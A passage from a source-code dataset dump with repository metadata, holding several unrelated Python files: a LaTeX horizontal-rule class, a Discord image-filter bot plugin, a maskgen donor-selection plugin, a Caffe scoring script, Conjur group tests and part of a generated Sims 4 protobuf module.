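# 1^4 + 6^4 + 3^4 + 4^4 = 1 + 1296 + 81 + 256 = 1634
assert 1**4 + 6**4 + 3**4 + 4**4 == 1634

so the script correctly reports 1634 as an Armstrong number.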
5f9c87648a4e17596d684c15485c9c92d81abb57 | 304 | py | Python | pyexlatex/models/format/hline.py | whoopnip/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | ["MIT"] | 4 | 2020-06-08T07:17:12.000Z | 2021-11-04T21:39:52.000Z | pyexlatex/models/format/hline.py | nickderobertis/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | ["MIT"] | 24 | 2020-02-17T17:20:44.000Z | 2021-12-20T00:10:19.000Z | pyexlatex/models/format/hline.py | nickderobertis/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | ["MIT"] | null | null | null | from pyexlatex.models.sizes.textwidth import TextWidth
from pyexlatex.models.format.rule import Rule
class HLine(Rule):
"""
Draws a horizontal line across the text width.
"""
def __init__(self, thickness: float = 0.4):
super().__init__(length=TextWidth(), thickness=thickness)
| 25.333333 | 65 | 0.710526 | 200 | 0.657895 | 0 | 0 | 0 | 0 | 0 | 0 | 62 | 0.203947 |
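For context, 0.4 pt is LaTeX's default rule thickness, and a Rule spanning TextWidth presumably renders to something like the following (an assumption about pyexlatex's output, not verified here):

\rule{\textwidth}{0.4pt}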
5f9d943e1c5e5e036c07d0eb1ed8c96b9fd06019 | 4,038 | py | Python | sixx/plugins/images.py | TildeBeta/6X | 1814eb8f394b7c25b49decdd7d7249567c85f30f | ["MIT"] | 2 | 2018-03-06T20:39:49.000Z | 2018-03-17T04:28:57.000Z | sixx/plugins/images.py | TildeBeta/TwitterImages | 1814eb8f394b7c25b49decdd7d7249567c85f30f | ["MIT"] | 2 | 2018-03-06T20:39:46.000Z | 2018-03-15T17:03:03.000Z | sixx/plugins/images.py | TildeBeta/TwitterImages | 1814eb8f394b7c25b49decdd7d7249567c85f30f | ["MIT"] | 1 | 2018-04-25T22:24:40.000Z | 2018-04-25T22:24:40.000Z | from math import sqrt
import asks
import datetime
import numpy as np
import random
from PIL import Image
from PIL.ImageDraw import Draw
from PIL.ImageEnhance import Brightness
from PIL.ImageFont import truetype
from curio import spawn_thread
from curious.commands import Context, Plugin, command
from io import BytesIO
from sixx.plugins.utils.pillow import add_noise, add_scanlines, antialiased_text, save_image
SCANLINES, NOISE, BOTH = range(3)
class Images(Plugin):
"""
Commands for image manipulation stuffs.
"""
@command()
async def vcr(self, ctx: Context, *, url: str):
# TODO support attachments
buffer = BytesIO()
resp = await asks.get(url, stream=True)
async for chunk in resp.body:
buffer.write(chunk)
async with ctx.channel.typing:
async with spawn_thread():
with Image.open(buffer) as image:
filter = np.random.choice(range(3), p=[0.7, 0.2, 0.1])
if filter == SCANLINES:
image = add_scanlines(image)
elif filter == NOISE:
image = add_noise(image)
else:
image = add_scanlines(image)
image = add_noise(image)
Brightness(image).enhance(2.5)
# hoo boy
text = np.random.choice(['PLAY', ' PAUSE'], p=[0.8, 0.2])
font = truetype('VCR_OSD_MONO.ttf', size=int(min(image.size) / 10))
start = datetime.datetime(1980, 1, 1, 0, 0)
now = datetime.datetime.utcnow()
# https://stackoverflow.com/a/8170651/7581432
random_date = start + datetime.timedelta(seconds=random.randint(0, int((now - start).total_seconds())))
topleft_text = antialiased_text(text, font, image.width, image.height, offset_x=1 / 30, offset_y=1 / 15)
image.paste(topleft_text, (0, 0), mask=topleft_text)
draw = Draw(image)
if text == 'PLAY':
width, height = font.getsize(text)
offset_x = width + image.width * (1 / 30) * 1.5
offset_y = image.height * (1 / 15)
draw.polygon(
[
(offset_x, offset_y),
(offset_x, offset_y + height),
(offset_x + sqrt(height ** 2 - (height / 2) ** 2), offset_y + height / 2)
],
fill=(255, 255, 255)
)
else:
_, height = font.getsize(' ')
offset_x = image.width * (1 / 35)
offset_y = image.height * (1 / 15)
part = (height - offset_x / 2) / 8
draw.rectangle(
[(offset_x, offset_y + part), (offset_x + 3 * part, offset_y - part + height)],
fill=(255, 255, 255))
draw.rectangle(
[(offset_x + 5 * part, offset_y + part), (offset_x + 8 * part, offset_y - part + height)],
fill=(255, 255, 255))
# This is a nasty hack but oh well
time, date = random_date.strftime('%H:%M|%b. %d %Y').split('|')
wrap_width = len(date)
botleft_text = antialiased_text(time.ljust(wrap_width + 1) + date, font, image.width, image.height,
offset_x=1 / 35, offset_y=13 / 15, wrap_width=wrap_width)
image.paste(botleft_text, (0, 0), mask=botleft_text)
buffer = save_image(image, format=image.format)
await ctx.channel.messages.upload(buffer, filename='shoutouts.' + image.format)
| 40.38 | 124 | 0.488856 | 3,586 | 0.888063 | 0 | 0 | 3,499 | 0.866518 | 3,484 | 0.862803 | 244 | 0.060426 |
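One note on the play-icon geometry in the plugin above: the triangle's vertices are (x0, y0), (x0, y0 + h) and (x0 + sqrt(h^2 - (h/2)^2), y0 + h/2), and since sqrt(h^2 - (h/2)^2) = (sqrt(3)/2) * h, all three sides come out to length h, so the drawn play button is an equilateral triangle whose side equals the text height.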
5f9df6e37fc71858adef3ee969afe3699916d4a6 | 2,669 | py | Python | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | ["BSD-3-Clause"] | null | null | null | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | ["BSD-3-Clause"] | null | null | null | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | ["BSD-3-Clause"] | null | null | null | import logging
from maskgen import video_tools
import random
import maskgen.video_tools
import os
import maskgen
import json
plugin = "DonorPicker"
def transform(img, source, target, **kwargs):
valid = []
possible = []
data = {}
logging.getLogger('maskgen').info(str(kwargs))
for f in os.listdir(kwargs['Directory']):
if os.path.splitext(f)[1] == '.json':
data = json.load(open(os.path.join(kwargs['Directory'],f)))
elif video_tools.get_shape_of_video(os.path.join(kwargs['Directory'], f)) == video_tools.get_shape_of_video(source):
possible.append(os.path.join(kwargs['Directory'],f))
for d in possible:
if os.path.split(d)[1] in data:
valid.append(d)
if len(valid) == 0:
raise ValueError('No donors of correct size available')
donor = valid[0]
if kwargs['Pick Preference'] == 'Random':
donor = valid[random.randint(0,len(valid)-1)]
elif kwargs['Pick Preference'] == 'By Name':
for v in valid:
if os.path.splitext(source)[0] in (os.path.split(v)[1]):
donor = v
elif kwargs['Pick Preference'] =='Specific':
donor = kwargs['Donator']
data = data[os.path.split(donor)[1]]
data['Donator'] = donor
logging.getLogger('maskgen').info("Donor Selected: {}".format(donor))
#shutil.copy((os.path.join(kwargs['Directory'],f)),os.path.join(scenario_model.get, f))
#result, err = callPlugin(kwargs['Plugin'],img,source,target,**kwargs)
#final = {k: v for d in [result, data] for k, v in d.items()} if result is not None else data
logging.getLogger('maskgen').info(str(data))
#os.remove(os.path.join(".", f))
return data,None
def operation():
return {'name': 'SelectRegion',
'category': 'Select',
'type': 'Selector',
'description': 'Pick a donor and other data from a directory',
'software': 'Maskgen',
'version': maskgen.__version__,
'arguments': {
'Directory': {
'type': 'file',
'defaultvalue': '.',
'description': 'Directory full of possible PRNU choices'
},
'Pick Preference': {
'type': 'list',
'values': ['Random', 'By Name', 'Specific'],
'defaultvalue': 'Random',
'description': 'Select the deciding factor for which video will be selected from the directory'
}
},
'transitions': [
'video.video'
'image.image'
]
} | 38.128571 | 124 | 0.557887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 990 | 0.370925 |
5f9e0f831db1b36f8edc783c6c1bfaa61c116474 | 1,228 | py | Python | track_model/eval_avg_scores.py | QUVA-Lab/lang-tracker | 6cb3630471765565b6f2d34a160f0cd51d95a082 | [
"BSD-2-Clause-FreeBSD"
] | 31 | 2017-09-13T13:40:59.000Z | 2022-01-25T16:55:19.000Z | track_model/eval_avg_scores.py | zhenyangli/lang-tracker | dddd808a22582573ab0a5e4c3dbf0ba054e42d61 | [
"BSD-3-Clause"
] | 4 | 2017-09-14T01:56:58.000Z | 2021-01-28T00:58:58.000Z | track_model/eval_avg_scores.py | QUVA-Lab/lang-tracker | 6cb3630471765565b6f2d34a160f0cd51d95a082 | [
"BSD-2-Clause-FreeBSD"
] | 9 | 2017-09-28T03:22:08.000Z | 2021-01-19T10:56:44.000Z | import caffe
import numpy as np
import os
import sys
import track_model_train as track_model
import train_config
max_iter = 1000
def eval_avg_scores(config):
with open('./track_model/scores.prototxt', 'w') as f:
f.write(str(track_model.generate_scores('', config)))
caffe.set_device(config.gpu_id)
caffe.set_mode_gpu()
# Load pretrained model
scores_net = caffe.Net('./track_model/scores.prototxt',
config.weights,
caffe.TEST)
#import ipdb; ipdb.set_trace()
scores = 0
num_sample = 0
for it in range(max_iter):
scores_net.forward()
scores_val = scores_net.blobs['fcn_scores'].data[...].copy()
scores += scores_val.sum()
num_sample += scores_val.size
# ALOV conv345 -> 0.01196
# OTB50 scores = 72313495.437500, samples = 1936000, avg_score = 37.364085 -> 0.02676
# ILSVRC scores = 66083375.812500, samples = 1936000, avg_score = 34.133975 -> 0.02929
avg_score = scores / num_sample
print('\tscores = %f, samples = %d, avg_score = %f\t'
% (scores, num_sample, avg_score))
if __name__ == '__main__':
config = train_config.Config()
eval_avg_scores(config)
| 29.95122 | 90 | 0.643322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 386 | 0.314332 |
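The arrow values in the dataset comments above are the reciprocals of the computed averages (1/37.364085 is about 0.02676 and 1/34.133975 is about 0.02929), so they read as per-dataset normalization factors for fcn_scores; the ALOV line's 0.01196 implies an average near 83.6.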
5f9e1b47610239b65145f24fa61ab7d89533b94e | 1,968 | py | Python | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | ["Apache-2.0"] | 1 | 2018-05-31T17:29:30.000Z | 2018-05-31T17:29:30.000Z | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | ["Apache-2.0"] | 8 | 2015-02-20T16:22:12.000Z | 2019-04-25T23:57:43.000Z | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | ["Apache-2.0"] | 8 | 2015-02-28T06:56:15.000Z | 2020-01-02T22:42:09.000Z | #
# Copyright (C) 2014 Conjur Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from mock import patch
import conjur
api = conjur.new_from_key('foo', 'bar')
group = api.group('v1/admins')
def test_group():
assert group.role.kind == 'group'
assert group.role.identifier == 'v1/admins'
assert group.role.roleid == api.config.account + ':group:v1/admins'
@patch.object(group.role, 'grant_to')
def test_add_member(mock_grant_to):
member = api.user('foo')
group.add_member(member)
mock_grant_to.assert_called_with(member, False)
@patch.object(group.role, 'grant_to')
def test_add_member_admin(mock_grant_to):
member = api.role('something', 'else')
group.add_member(member, True)
mock_grant_to.assert_called_with(member, True)
@patch.object(group.role, 'revoke_from')
def test_remove_member(mock_revoke_from):
member = api.user('foo')
group.remove_member(member)
mock_revoke_from.assert_called_with(member)
| 37.132075 | 82 | 0.757622 | 0 | 0 | 0 | 0 | 582 | 0.295732 | 0 | 0 | 1,187 | 0.60315 |
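The mocking pattern in the tests above, @patch.object(obj, 'method') with the generated MagicMock injected as the test's first argument, is plain unittest.mock and works standalone. A minimal self-contained sketch (the class and names are mine):

from unittest.mock import patch

class Role:
    def grant_to(self, member, admin=False):
        raise RuntimeError('would hit the network')

role = Role()

@patch.object(role, 'grant_to')
def demo(mock_grant_to):
    role.grant_to('alice', True)              # intercepted by the MagicMock
    mock_grant_to.assert_called_with('alice', True)

demo()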
5f9e9628295536489ee271571858b5c113c24c7c | 99,362 | py | Python | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | ["Apache-2.0"] | null | null | null | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | ["Apache-2.0"] | null | null | null | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | ["Apache-2.0"] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: D:\dev\TS4\_deploy\Client\Releasex64\Python\Generated\protocolbuffers\Social_pb2.py
# Compiled at: 2020-12-13 14:24:09
# Size of source mod 2**32: 103336 bytes
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
import protocolbuffers.Consts_pb2 as Consts_pb2
import protocolbuffers.Chat_pb2 as Chat_pb2
import protocolbuffers.S4Common_pb2 as S4Common_pb2
import protocolbuffers.Localization_pb2 as Localization_pb2
import protocolbuffers.Exchange_pb2 as Exchange_pb2
DESCRIPTOR = descriptor.FileDescriptor(name='Social.proto',
package='EA.Sims4.Network',
serialized_pb='\n\x0cSocial.proto\x12\x10EA.Sims4.Network\x1a\x0cConsts.proto\x1a\nChat.proto\x1a\x0eS4Common.proto\x1a\x12Localization.proto\x1a\x0eExchange.proto"v\n\x0fSocialFriendMsg\x12\r\n\x05simId\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x0c\n\x04note\x18\x03 \x01(\t\x12\x0e\n\x06prefix\x18\x04 \x01(\t\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x12\n\ncheatForce\x18\x06 \x01(\x08",\n\x18SocialPersonaResponseMsg\x12\x10\n\x08personas\x18\x01 \x03(\t"\x7f\n\x15SocialGenericResponse\x12\r\n\x05error\x18\x01 \x01(\r\x121\n\x08msg_type\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x0e\n\x06postId\x18\x03 \x01(\x0c\x12\x14\n\x0cpostParentId\x18\x04 \x01(\x0c"¼\x02\n\x14SocialPlayerInfoList\x12B\n\x07players\x18\x01 \x03(\x0b21.EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo\x1aß\x01\n\nPlayerInfo\x12\x13\n\x0bAccountName\x18\x01 \x01(\t\x12\x14\n\x0cAccountNotes\x18\x02 \x01(\t\x128\n\x08presence\x18\x03 \x01(\x0e2&.EA.Sims4.Network.OnlinePresenceStatus\x12\x15\n\rOnlineStatus2\x18\x04 \x01(\t\x12\x11\n\tNucleusId\x18\t \x01(\x04\x12\x11\n\tPlayerBio\x18\n \x01(\t\x12\x18\n\x10exclude_reported\x18\x0b \x01(\x08\x12\x15\n\rIsUserBlocked\x18\x0c \x01(\x08"a\n\x0fSocialSearchMsg\x12\x0e\n\x06prefix\x18\x01 \x01(\t\x12>\n\x0esearch_results\x18\x02 \x03(\x0b2&.EA.Sims4.Network.LocalizedStringToken"=\n\x12OriginErrorMessage\x12\x11\n\terrorcode\x18\x01 \x01(\r\x12\x14\n\x0cerrormessage\x18\x02 \x01(\t"\x97\x01\n\x1bSocialInviteResponseMessage\x12\x14\n\x0cinvitationid\x18\x01 \x01(\t\x12\x16\n\x0einvitationtype\x18\x02 \x01(\r\x12\x18\n\x10inviternucleusid\x18\x03 \x01(\x04\x12\x19\n\x11accepternucleusid\x18\x04 \x01(\x04\x12\x15\n\ractionSuccess\x18\x05 \x01(\x08"J\n\x13SocialCassandraTest\x123\n\x06opcode\x18\x01 \x01(\x0e2#.EA.Sims4.Network.CassandraTestCode"\x88\x01\n\x1eSocialFriendListRequestMessage\x12\x12\n\naccount_id\x18\x01 \x01(\x04\x12\x11\n\tfriend_id\x18\x02 \x01(\x04\x12\x13\n\x0baddress_str\x18\x03 \x01(\t\x12\x12\n\nobject_str\x18\x04 \x01(\t\x12\x16\n\x0ereply_proxy_id\x18\x05 \x01(\x04"_\n!SocialRequestNucleusIdFromPersona\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x13\n\x0bpersonaName\x18\x02 \x01(\t\x12\x12\n\nmessage_id\x18\x03 \x01(\r"^\n"SocialNucleusIdFromPersonaResponse\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x12\n\nmessage_id\x18\x03 \x01(\r"S\n\x15SocialExchangeMessage\x12:\n\x08envelope\x18\x01 \x01(\x0b2(.EA.Sims4.Network.ExchangeSocialEnvelope"+\n\x16SocialFollowersMessage\x12\x11\n\tsfim_blob\x18\x01 \x03(\x0c"Û\x02\n\x15SocialFeedItemMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x127\n\tfeed_type\x18\x02 \x01(\x0e2$.EA.Sims4.Network.SocialFeedItemType\x120\n\x08metadata\x18\x03 \x01(\x0b2\x1e.EA.Sims4.Network.TrayMetadata\x12\x11\n\tnucleusid\x18\x04 \x01(\x04\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x10\n\x08quantity\x18\x06 \x01(\x04\x12\x1a\n\x12follower_nucleusid\x18\x07 \x01(\x04\x12\x18\n\x10follower_persona\x18\x08 \x01(\t\x12@\n\x0efollowers_blob\x18\t \x01(\x0b2(.EA.Sims4.Network.SocialFollowersMessage\x12\x18\n\x10is_maxis_curated\x18\n \x01(\x08"Z\n!SocialFeedItemUnserializedMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x12\x0c\n\x04data\x18\x02 \x01(\x0c\x12\x16\n\x0ecount_override\x18\x03 \x01(\x04"d\n\x18SocialWallCommentMessage\x12\x0c\n\x04uuid\x18\x01 \x01(\x0c\x12\x11\n\tauthor_id\x18\x02 \x01(\x04\x12\x16\n\x0eauthor_persona\x18\x03 \x01(\t\x12\x0f\n\x07message\x18\x04 \x01(\t"Ù\x01\n\x1cSocialGetWallCommentsMessage\x12\x11\n\tnucleusid\x18\x01 
\x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x15\n\rstarting_uuid\x18\x03 \x01(\x0c\x12\x13\n\x0bnum_results\x18\x04 \x01(\r\x12<\n\x08messages\x18\x05 \x03(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage\x12\x0e\n\x06hidden\x18\x06 \x01(\x08\x12\x18\n\x10exclude_reported\x18\x07 \x01(\x08"\x82\x01\n\x1cSocialPostWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12;\n\x07message\x18\x03 \x01(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage"U\n\x1eSocialDeleteWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x0c\n\x04uuid\x18\x03 \x01(\x0c"Õ\x01\n\x1cSocialRequestFeedWallMessage\x12\x13\n\x0bending_uuid\x18\x01 \x01(\x0c\x129\n\x08messages\x18\x02 \x03(\x0b2\'.EA.Sims4.Network.SocialFeedItemMessage\x12R\n\x15unserialized_messages\x18\x03 \x03(\x0b23.EA.Sims4.Network.SocialFeedItemUnserializedMessage\x12\x11\n\tnum_items\x18\x04 \x01(\r"m\n\x1dSocialRequestFollowersMessage\x12\x10\n\x08playerid\x18\x01 \x01(\x04\x12\n\n\x02id\x18\x02 \x01(\t\x12\x19\n\x11prev_last_persona\x18\x03 \x01(\t\x12\x13\n\x0bnum_request\x18\x04 \x01(\r";\n\x1eSocialRequestIgnoreListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04"é\x01\n\x1eSocialGetPlayerInfoListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04\x12U\n\x10player_info_list\x18\x02 \x03(\x0b2;.EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo\x1aU\n\nPlayerInfo\x12\x12\n\nnucleus_id\x18\x01 \x01(\x04\x12\x16\n\x0eorigin_persona\x18\x02 \x01(\t\x12\x1b\n\x13first_party_persona\x18\x03 \x01(\t"X\n\x1cSocialCommentPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x11\n\tcommentid\x18\x02 \x01(\x0c\x12\x12\n\ncommentKey\x18\x03 \x01(\t"D\n\x18SocialBioPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x15\n\rbio_nucleusid\x18\x02 \x01(\x04"+\n\x18SocialFeedRemovalMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c"\x8f\x12\n\x14SocialControlMessage\x12/\n\x06opcode\x18\x01 \x02(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12.\n\x05subop\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x15\n\rtransactionId\x18\x03 \x01(\x04\x12\x0e\n\x06result\x18d \x01(\r\x12J\n\x12getwallcommentsmsg\x18\x04 \x01(\x0b2..EA.Sims4.Network.SocialGetWallCommentsMessage\x12J\n\x12postwallcommentmsg\x18\x05 \x01(\x0b2..EA.Sims4.Network.SocialPostWallCommentMessage\x12N\n\x14deletewallcommentmsg\x18\x06 \x01(\x0b20.EA.Sims4.Network.SocialDeleteWallCommentMessage\x124\n\tfriendmsg\x18\x07 \x01(\x0b2!.EA.Sims4.Network.SocialFriendMsg\x12@\n\x0fgenericresponse\x18\x08 \x01(\x0b2\'.EA.Sims4.Network.SocialGenericResponse\x12:\n\nplayerinfo\x18\t \x01(\x0b2&.EA.Sims4.Network.SocialPlayerInfoList\x12:\n\nfeedsubmsg\x18\n \x01(\x0b2&.EA.Sims4.Network.SocialFeedSubMessage\x12:\n\x0fsearchresultmsg\x18\x0b \x01(\x0b2!.EA.Sims4.Network.SocialSearchMsg\x12H\n\x11inviteresponsemsg\x18\x0c \x01(\x0b2-.EA.Sims4.Network.SocialInviteResponseMessage\x129\n\x0boriginerror\x18\r \x01(\x0b2$.EA.Sims4.Network.OriginErrorMessage\x12B\n\x13socialcassandratest\x18\x0e \x01(\x0b2%.EA.Sims4.Network.SocialCassandraTest\x12T\n\x1asocialfriendlistrequestmsg\x18\x0f \x01(\x0b20.EA.Sims4.Network.SocialFriendListRequestMessage\x12^\n!socialrequestnucleusidfrompersona\x18\x10 \x01(\x0b23.EA.Sims4.Network.SocialRequestNucleusIdFromPersona\x12`\n"socialnucleusidfrompersonaresponse\x18\x11 \x01(\x0b24.EA.Sims4.Network.SocialNucleusIdFromPersonaResponse\x12F\n\x15socialexchangemessage\x18\x12 
\x01(\x0b2\'.EA.Sims4.Network.SocialExchangeMessage\x12T\n\x1csocialrequestfeedwallmessage\x18\x13 \x01(\x0b2..EA.Sims4.Network.SocialRequestFeedWallMessage\x12A\n\x0cstat_tickers\x18\x15 \x01(\x0b2+.EA.Sims4.Network.ExchangeStatTickerMessage\x12L\n\x14comment_petition_msg\x18\x16 \x01(\x0b2..EA.Sims4.Network.SocialCommentPetitionMessage\x12B\n\x0efeedremovalmsg\x18\x17 \x01(\x0b2*.EA.Sims4.Network.SocialFeedRemovalMessage\x12D\n\x10bio_petition_msg\x18\x18 \x01(\x0b2*.EA.Sims4.Network.SocialBioPetitionMessage\x12B\n\x0cfb_event_msg\x18\x19 \x01(\x0b2,.EA.Sims4.Network.SocialFacebookEventMessage\x12M\n\x14requestfollowers_msg\x18\x1a \x01(\x0b2/.EA.Sims4.Network.SocialRequestFollowersMessage\x12O\n\x15responsefollowers_msg\x18\x1b \x01(\x0b20.EA.Sims4.Network.SocialResponseFollowersMessage\x12O\n\x15requestignorelist_msg\x18\x1c \x01(\x0b20.EA.Sims4.Network.SocialRequestIgnoreListMessage\x12W\n\x1dresponse_player_info_list_msg\x18\x1d \x01(\x0b20.EA.Sims4.Network.SocialGetPlayerInfoListMessage\x12_\n\x1eplayer_identification_list_msg\x18\x1e \x01(\x0b27.EA.Sims4.Network.ServerPlayerIdentificationListMessage\x12@\n\rcandidate_msg\x18\x1f \x01(\x0b2).EA.Sims4.Network.SocialCandidatesMessage\x12P\n\x16evaluation_results_msg\x18 \x01(\x0b20.EA.Sims4.Network.SocialEvaluationResultsMessage\x12>\n\rcg_update_msg\x18! \x01(\x0b2\'.EA.Sims4.Network.SocialCGUpdateMessage"7\n\x13SocialInvalidateMsg\x12\x13\n\x0bcache_index\x18\x01 \x01(\r\x12\x0b\n\x03key\x18\x02 \x01(\x0c"t\n"SocialControlQueueBroadcastMessage\x127\n\x07control\x18\x01 \x01(\x0b2&.EA.Sims4.Network.SocialControlMessage\x12\x15\n\tfriendIds\x18\x03 \x03(\x04B\x02\x10\x01"5\n\x10LifeEventMessage\x12\x0c\n\x04type\x18\x01 \x01(\r\x12\x13\n\x07sim_ids\x18\x02 \x03(\x06B\x02\x10\x01"Q\n\x1aSocialFacebookEventMessage\x12\x10\n\x08objectId\x18\x01 \x02(\t\x12\x13\n\x0baccessToken\x18\x02 \x02(\t\x12\x0c\n\x04guid\x18\x03 \x02(\t"¹\x01\n"SocialCandidateStatisticSubmessage\x12\x11\n\tremote_id\x18\x01 \x01(\x0c\x12\x13\n\x0bviews_count\x18\x02 \x01(\r\x12\x12\n\nwins_count\x18\x03 \x01(\r\x12\x10\n\x08platform\x18\x04 \x01(\r\x12\x10\n\x08category\x18\x05 \x01(\r\x12\x18\n\x0cwas_reported\x18\x06 \x01(\x08B\x02\x18\x01\x12\x19\n\x11expires_epoch_sec\x18\x07 \x01(\x04"ì\x01\n\x17SocialCandidatesMessage\x12\r\n\x05count\x18\x01 \x01(\r\x12\x1c\n\x14platform_restriction\x18\x02 \x01(\r\x12\x1c\n\x14category_restriction\x18\x03 \x01(\r\x12\x11\n\tchallenge\x18\x04 \x01(\t\x12\x0e\n\x06digest\x18\x05 \x01(\x0c\x12H\n\ncandidates\x18\x06 \x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage\x12\x19\n\x11expire_epoch_secs\x18\x07 \x01(\x04"W\n\x1eSocialEvaluationResultsMessage\x12\x12\n\nwinner_ids\x18\x01 \x03(\t\x12\x11\n\tloser_ids\x18\x02 \x03(\t\x12\x0e\n\x06digest\x18\x03 \x01(\x0c"t\n\x15SocialCGDigestMessage\x12\x11\n\tchallenge\x18\x01 \x01(\t\x12H\n\ncandidates\x18\x02 
\x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage*¾\x01\n\x12SocialFeedItemType\x12\x17\n\x13SFI_ITEM_DOWNLOADED\x10\x00\x12\x15\n\x11SFI_ITEM_UPLOADED\x10\x01\x12\x16\n\x12SFI_ITEM_FAVORITED\x10\x02\x12\x16\n\x12SFI_ITEM_COMMENTED\x10\x03\x12\x16\n\x12SFI_ITEM_SHOWCASED\x10\x04\x12\x19\n\x15SFI_PROFILE_COMMENTED\x10\x05\x12\x15\n\x11SFI_NEW_FOLLOWERS\x10\x06*\x86\x02\n\x18SocialClusterMessageType\x12\r\n\tSOC_LOGIN\x10\x00\x12\x0e\n\nSOC_LOGOFF\x10\x01\x12\x16\n\x12SOC_PRESENCEUPDATE\x10\x02\x12\x12\n\x0eSOC_FEEDUPDATE\x10\x03\x12\x13\n\x0fSOC_ADD_FEEDSUB\x10\x04\x12\x16\n\x12SOC_REMOVE_FEEDSUB\x10\x05\x12\x18\n\x14SOC_BROADCAST_PRIVOP\x10\x06\x12\x18\n\x14SOC_BROADCAST_QUEUED\x10\x08\x12"\n\x1eSOC_BROADCAST_CACHE_INVALIDATE\x10\t\x12\x1a\n\x16SOC_REST_USER_REGISTER\x10\n')
_SOCIALFEEDITEMTYPE = descriptor.EnumDescriptor(name='SocialFeedItemType',
full_name='EA.Sims4.Network.SocialFeedItemType',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(name='SFI_ITEM_DOWNLOADED',
index=0,
number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_UPLOADED',
index=1,
number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_FAVORITED',
index=2,
number=2,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_COMMENTED',
index=3,
number=3,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_SHOWCASED',
index=4,
number=4,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_PROFILE_COMMENTED',
index=5,
number=5,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_NEW_FOLLOWERS',
index=6,
number=6,
options=None,
type=None)],
containing_type=None,
options=None,
serialized_start=6663,
serialized_end=6853)
_SOCIALCLUSTERMESSAGETYPE = descriptor.EnumDescriptor(name='SocialClusterMessageType',
